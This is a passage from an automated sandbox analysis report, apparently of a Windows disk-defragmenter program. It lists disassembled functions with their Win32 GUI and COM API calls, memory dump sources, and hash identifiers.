                                                                                                                                                                                                                                                                                                • IsWindow.USER32(004216E9), ref: 00422459
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004224AE
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004224E0
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(004216E9,00000001,000003E8,00000000), ref: 0042250F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00422558
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008013,00000000), ref: 0042256D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008007,00000000), ref: 00422582
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,0000800C,00000000), ref: 00422597
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(004216E9,00000064,00000064,00000000), ref: 004225A3
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Timer$Window
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 389327760-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                                • Instruction ID: a9acc03ce2714c2a1218ac3b36ef8cf29172f02598394e016a1efff805efb144
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C516170390B00ABE624EB75CC82FD6B395AF44B04F40851DB359AB2D1CBF6B8418B48
                                                                                                                                                                                                                                                                                                Function 0040ECF0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0040ED30
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0040EDD3
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EDF9
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040EE67
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040EE77
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0040EEEE
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0040EF77
                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,?,?,?,?), ref: 0040EFD9
                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,?,?,?,?), ref: 0040F00C
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0040F073
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$CompatibleCopyCreateMessageSend$Bitmap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2897418849-3916222277
                                                                                                                                                                                                                                                                                                • Opcode ID: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                                • Instruction ID: af6e71f7250828e30cc2f680655b832ce69016c02ffdd7eabd90966ae28b2504
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FC1F3B11083419FC324CF69C984B6BBBE9FF88704F108A2EF59993290DB74E945CB56
                                                                                                                                                                                                                                                                                                Function 00425C00 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadMenuW.USER32(00000000), ref: 00425C5A
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,00000003), ref: 00425C85
                                                                                                                                                                                                                                                                                                • CheckMenuItem.USER32(?,00008029,00000008), ref: 00425DAB
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000088), ref: 00425DBD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$CheckItemLoadRectWindow
                                                                                                                                                                                                                                                                                                • String ID: 1003007$1003008$1003009$1003010$3401095$DefragFinish$DiskDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 64815558-1687404023
                                                                                                                                                                                                                                                                                                • Opcode ID: 182fb5aa05407dff1fb33d3373427549e83ff2224f272dee2797ef27b0f06224
                                                                                                                                                                                                                                                                                                • Instruction ID: 4418ca87599e6f793fb4d10bf028e48e6936bb9db45e74f47fa123fcf7e21ce3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 182fb5aa05407dff1fb33d3373427549e83ff2224f272dee2797ef27b0f06224
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2151CAB1794701BAE350AB609C47FAB7268AB84B14F10C91FB75EB65C0CEFCA405875D
                                                                                                                                                                                                                                                                                                Function 00415960 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004159AA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00415AB2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402005$3402065$3402067$3402068$3402069$3402070$3402071$3402072$3402084
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-328498535
                                                                                                                                                                                                                                                                                                • Opcode ID: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                                • Instruction ID: 1067327c746e147da740696a904bc1cbb70a89f86cbb7c2e495eb833b01c89ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36413CF0B907407AD260AF618D43FEA3268AF84F04F60C42FB70E765D1CAEC6905969D
                                                                                                                                                                                                                                                                                                Function 00417F00 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 110windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00417F45
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00417F5B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(0047D9D0,00001001,00000000,?), ref: 0041804D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3401074$3401075$3401076$3401077$8<$DiskDefrag$Mid_Back_Color$Window
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2758692112
                                                                                                                                                                                                                                                                                                • Opcode ID: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                                • Instruction ID: 56ac88722a8962ac1f975558d68bc042bced7a88e006b99efbc398d4c5261ff8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B23156B07903007AE274EB258C83FEA72659F44B14F20452FB71E762D1CEF97844565C
                                                                                                                                                                                                                                                                                                Function 0042C690 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0042C6CB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0042D010: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042D041
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID: 3401007$3401034$3401035$8<$DiskDefrag$Frame_Color$Mid_Back_Color$Text_Color$Window$Window_Back_Gray_Color
                                                                                                                                                                                                                                                                                                • API String ID: 909852535-1675042175
                                                                                                                                                                                                                                                                                                • Opcode ID: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                                • Instruction ID: 43899c4dce7d941302b132538349e8bcafe351e88f225ab48a7149cde0acca41
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD316F707907017BD260BAB58C43FEA76A4AF84B04F20891BB65EB75C1CAF874419B9C
                                                                                                                                                                                                                                                                                                Function 00451C80 Relevance: 18.2, APIs: 12, Instructions: 181commemoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00451CBB
                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0047D360,00000000,00000001,0047D170,?), ref: 00451CDF
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00451CF8
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00451D24
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00451D4B
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00451D72
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00451E17
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00451E1E
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00451E25
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 00451E37
                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(0047EF4C), ref: 00451E69
                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00451EA8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit$String$AllocCreateFreeInitializeInstance
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 162617764-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                                • Instruction ID: 4a3acebe906db87488b43d3aef87afcda0e18f97818647458927d115f12b3f92
